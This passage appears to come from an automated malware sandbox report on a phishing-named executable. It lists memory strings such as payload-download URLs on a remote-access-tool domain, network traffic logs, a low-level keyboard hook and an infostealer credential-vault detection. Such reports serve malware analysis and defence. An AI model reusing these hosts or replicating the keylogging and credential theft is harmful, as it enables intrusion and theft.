                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27290000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25BC7000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD282E5000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28363000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25757000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28D9D000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25ABB000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD29952000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25B06000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD270A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.freecsstemplates.org
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD299FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.uniformserver.com
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD299FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.uniformserver.com/
                  Source: InstallUtil.exe, 00000007.00000002.2587711713.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                  Source: InstallUtil.exe, 00000007.00000002.2587711713.0000000000402000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2590372149.0000000002FA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                  Source: InstallUtil.exe, 00000007.00000002.2590372149.0000000002FA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                  Source: InstallUtil.exe, 00000007.00000002.2590372149.0000000002FA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD270A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://artemis-rat.com/
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28405000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2839C000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28481000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://artemis-rat.com/get/65ea3f36355a
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://artemis-rat.com/get/65ea3f36355af120f2a52c2f
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://artemis-rat.com/get/65ea3f36355af120f2a52c2fX
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD299F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://artemis-rat.com:443
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2880C000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD287FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://asocks.com/add-money/e694d447e9d328427188f733b14b6985
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD285B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto&display=swap
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2508C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2508C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/TheSpeedX/PROXY-List/blob/master/http.txt
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD285B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://globalurl.fortinet.net:8010/XX/YY/ZZ/CI/MGPGHGPGPFGHDDPFGGHGFHBGCHEGPFBGAHAH)
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD256E9000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ktxcomay.com.vn
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD29949000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pki.goog/repository/0
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD286E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.torproject.org/documentation.html
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52516
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53606
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52521 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54813
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51866 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55228
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50694
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52609 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54893
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55002 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54892 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52510
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55054 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52083
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53036 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51969 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52610 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51978 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54826
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54825
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51605 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51551
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51434
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51435
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51556
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51432
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52083 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52521
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53611
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55228 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51433
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52510 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55002
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52131
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51746 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52573 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53042 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55034 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51551 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53526 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52603 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54959
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51605
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51606
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51969
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52135 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51566 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51288
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52135
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52132
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51561
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52133
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51566
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52138
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55009
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52136
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50487 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53121 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53611 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51749 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52209 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54245 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55010
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52132 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53041 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55010 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51978
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51594 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51976 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51976
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51737
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51858
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52138 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51573
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51433 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51376 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54960
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51288 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50487
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53117
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53129 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51972
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53121
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53520 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54825 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51606 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51746
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53527
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51866
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52053 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53526
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50149 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52133 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51749
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51375 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50493
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53520
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50496
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55009 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51066
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53129
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51432 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51864
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51862
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53126 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53126
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53522
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53527 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51862 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55034
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55033
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54994 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53542 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50149
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52209
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52603
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52609
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51759
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52136 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51435 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51594
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54893 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51561 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52053
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50694 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53522 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53117 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50493 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54813 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51434 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51864 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53542
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54960 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54994
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53606 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52573
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53558 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52216
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52610
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51858 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55053
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55033 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55054
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51759 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50496 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51556 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54826 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51573 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52516 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51737 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51375
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54764
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51376
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51972 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53036
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54245
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53558
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52216 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52502
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53040
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55053 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54764 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54892
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51066 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53042
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53041
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52131 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54959 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52502 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53040 -> 443
                  Source: unknownHTTPS traffic detected: 140.82.114.3:443 -> 192.168.2.9:49714 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 222.255.238.159:443 -> 192.168.2.9:50694 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.140.87:443 -> 192.168.2.9:54245 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.9:55228 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_02E6F514 SetWindowsHookExA 0000000D,00000000,?,?,?,?,?,?,?,?,?,02E6FBA0,00000000,000000007_2_02E6F514
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exeJump to behavior

                  System Summary

                  barindex
                  Source: 7.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: initial sampleStatic PE information: Filename: New Orders#U034fx#U034fl#U034fx#U034f..exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_02E6E0607_2_02E6E060
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_02E64AA87_2_02E64AA8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_02E6E8E07_2_02E6E8E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_02E6A8A87_2_02E6A8A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_02E63E907_2_02E63E90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_02E6AD087_2_02E6AD08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_02E641D87_2_02E641D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_06A3C8607_2_06A3C860
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_06A3C8687_2_06A3C868
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_06A39E087_2_06A39E08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_06A534287_2_06A53428
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_06A565A87_2_06A565A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_06A555587_2_06A55558
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_06A5B1D87_2_06A5B1D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_06A5C1187_2_06A5C118
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_06A57D307_2_06A57D30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_06A576507_2_06A57650
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_06A5E3307_2_06A5E330
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_06A500407_2_06A50040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_06A55CB07_2_06A55CB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_06A500077_2_06A50007
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7672 -s 107896
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exeStatic PE information: No import functions for PE file found
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000000.1333872594.000002AD23482000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameAssalamAlaikum.exe> vs New Orders#U034fx#U034fl#U034fx#U034f..exe
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25041000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs New Orders#U034fx#U034fl#U034fx#U034f..exe
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exeBinary or memory string: OriginalFilenameAssalamAlaikum.exe> vs New Orders#U034fx#U034fl#U034fx#U034f..exe
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeSection loaded: riched20.dllJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeSection loaded: usp10.dllJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeSection loaded: msls31.dllJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exeSection loaded: secur32.dllJump to behavior
